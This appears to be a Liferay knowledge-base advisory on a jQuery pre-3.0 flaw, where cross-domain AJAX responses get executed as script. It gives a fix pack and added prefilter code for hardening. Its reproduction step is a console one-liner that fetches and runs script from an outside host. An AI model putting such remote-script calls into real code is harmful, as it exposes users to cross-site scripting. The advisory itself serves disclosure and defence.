This article documents a security issue in jQuery versions prior to 3.0, which is also described on GitHub.
The issue can be reproduced with the following steps.
- Install a theme that uses jQuery prior to 3.0.
- Head to any page with that theme.
- Open the developer console.
- Type in:
    jQuery.get('https://sakurity.com/jqueryxss').then(console.log.bind(console));
Result: The page executes the JavaScript even though we only wanted jQuery to retrieve the text. A popup appears with localhost as content.
Affected Product/s
Liferay DXP 7.0 (DE 7.0)
Resolution
Fixed by DXP 7.0 Fix Pack 28. (LPE-16368)
Liferay Security Vulnerability Information
This issue does not have a Liferay Security Vulnerability (LSV) severity attached because it does not fulfill the requirements of Liferay's Security Policy to be considered a Liferay product vulnerability: no out-of-the-box component in DXP 7.0 makes AJAX calls to untrusted third-party sites. The only way to exploit it therefore requires deploying custom code, which falls under the developer team's realm.
Additional Information
The Liferay platform uses jQuery 2.1.4 in DXP 7.0, and plans to upgrade to jQuery version 3.2.1 or above in future versions of the Liferay product.
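For custom code that makes cross-domain AJAX calls on a jQuery version prior to 3.0, the following added example (not part of the original article and not Liferay's fix) registers an AJAX prefilter so that a cross-domain response served with a JavaScript content type is returned as text instead of being executed. The function names are chosen for illustration; jQuery.ajaxPrefilter and jQuery.fn.jquery are jQuery's own API.

```javascript
// Added example: hardening for custom code running on jQuery < 3.0.
// Function names here are illustrative, not part of jQuery or Liferay.

// Returns true when the reported version string is older than 3.0.
function isAffectedJQuery(version) {
  const major = parseInt(String(version).split('.')[0], 10);
  // An unparseable version is treated as affected (fail safe).
  return Number.isNaN(major) || major < 3;
}

// The prefilter: for cross-domain requests, switch off content-type
// detection for scripts, so a "text/javascript" response is not evaluated.
// A request with an explicit dataType: "script" still executes, because
// the caller asked for that.
function crossDomainScriptGuard(settings) {
  if (settings.crossDomain && settings.contents) {
    settings.contents.script = false;
  }
}

// Registers the guard on the given jQuery object when it is affected.
// Returns true if the guard was installed.
function hardenJQuery(jq) {
  if (!jq || typeof jq.ajaxPrefilter !== 'function') return false;
  if (!isAffectedJQuery(jq.fn && jq.fn.jquery)) return false;
  jq.ajaxPrefilter(crossDomainScriptGuard);
  return true;
}

// In a theme or portlet, run once after jQuery loads and before any AJAX call.
if (typeof jQuery !== 'undefined') {
  hardenJQuery(jQuery);
}
```

For a single call, passing an explicit data type, as in jQuery.ajax({ url: url, dataType: 'text' }), also keeps the response from being evaluated.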